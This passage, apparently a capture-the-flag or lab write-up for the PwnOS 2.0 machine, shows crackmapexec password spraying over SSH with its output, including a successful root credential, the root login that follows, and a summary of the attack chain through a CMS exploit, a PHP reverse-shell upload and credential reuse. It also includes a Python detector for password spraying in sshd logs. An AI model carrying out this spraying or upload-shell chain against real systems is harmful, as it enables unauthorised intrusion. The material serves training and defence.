crackmapexec finds the working pair

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo crackmapexec ssh 10.10.10.100 -p passwords.lst -u users.lst --continue-on-success           
SSH         10.10.10.100    22     10.10.10.100     [*] SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] root:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [+] root:root@ISIntS (Pwn3d!)
SSH         10.10.10.100    22     10.10.10.100     [-] root:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:root@ISIntS Authentication failed.                                                                                                          
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:hugomc Authentication failed.     
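The run above leaves a clear trace on the target: within a few seconds one source address fails password authentication for several different accounts and then succeeds for one of them. As an added example (not from the original write-up), the Python below detects that pattern in sshd auth.log lines; the log lines, timestamps and the 10.10.10.129 source address are constructed for the example, and the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Optional

# Constructed auth.log lines in the format OpenSSH 5.x on Ubuntu writes.
SAMPLE_AUTH_LOG = """\
Sep 29 23:40:01 web sshd[2201]: Failed password for invalid user administrator from 10.10.10.129 port 50122 ssh2
Sep 29 23:40:02 web sshd[2203]: Failed password for invalid user admin from 10.10.10.129 port 50124 ssh2
Sep 29 23:40:03 web sshd[2205]: Failed password for dan from 10.10.10.129 port 50126 ssh2
Sep 29 23:40:04 web sshd[2207]: Failed password for root from 10.10.10.129 port 50128 ssh2
Sep 29 23:40:05 web sshd[2209]: Accepted password for root from 10.10.10.129 port 50130 ssh2
Sep 29 23:40:06 web sshd[2211]: Failed password for invalid user hugomc from 10.10.10.129 port 50132 ssh2
Sep 29 23:45:00 web sshd[2300]: Failed password for dan from 10.10.10.5 port 41000 ssh2
Sep 29 23:45:01 web sshd[2300]: pam_unix(sshd:auth): authentication failure; logname= uid=0
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line: str, year: int = 2024) -> Optional[dict]:
    """Parse one sshd password-auth line; unrelated lines give None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_password_spray(lines: Iterable[str], window_seconds: int = 300,
                          min_users: int = 3) -> List[dict]:
    """Flag source IPs that fail logins for at least min_users distinct
    accounts inside window_seconds, and list any account that then succeeded."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for event in filter(None, map(parse_line, lines)):
        by_ip[event["ip"]].append(event)

    alerts = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        failures = [e for e in events if e["result"] == "Failed"]
        best: set = set()
        start = 0
        for end in range(len(failures)):  # sliding time window over failures
            while (failures[end]["ts"] - failures[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            users = {e["user"] for e in failures[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            accepted = sorted({e["user"] for e in events if e["result"] == "Accepted"})
            alerts.append({"ip": ip, "distinct_users": sorted(best), "accepted_as": accepted})
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_AUTH_LOG):
        print(f"{alert['ip']}: tried {len(alert['distinct_users'])} accounts "
              f"{alert['distinct_users']}, succeeded as {alert['accepted_as'] or 'none'}")
```

The single failure from 10.10.10.5 stays below the threshold, so only the spraying address is reported.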

Root obtained

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo ssh root@10.10.10.100                                                                                                                                                     
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password: 
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Fri Aug  9 18:44:09 EDT 2024

  System load:  0.0               Processes:           77
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~# whoami
root
root@web:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe8d:63ff/64 scope link 
       valid_lft forever preferred_lft forever

Check sudo privileges

root@web:~# sudo -l
Matching Defaults entries for root on this host:
    env_reset

User root may run the following commands on this host:
    (ALL : ALL) ALL

Summary

The nmap scan showed ports 22 and 80 open on the target.
Visiting port 80 and brute-forcing directories revealed a CMS running under /blog.
Inspecting the page source gave the CMS name and version, Simple PHP Blog 0.4.0, so searchsploit was checked for an exploit script.
The script found there was used to create a new account in the CMS, which then logged in successfully.
The admin back end has an image upload; after confirming that .php files are accepted, a reverse shell was uploaded and a shell obtained.
Enumeration from the initial shell turned up two database connection files, one of them the copy the CMS actually uses. Its credentials logged in to MySQL, where the users table held a SHA-1 password hash that could be cracked.
Trying the collected credentials against SSH gave a root login: whoever deployed the CMS had reused the MySQL root password as the Linux root password 😓
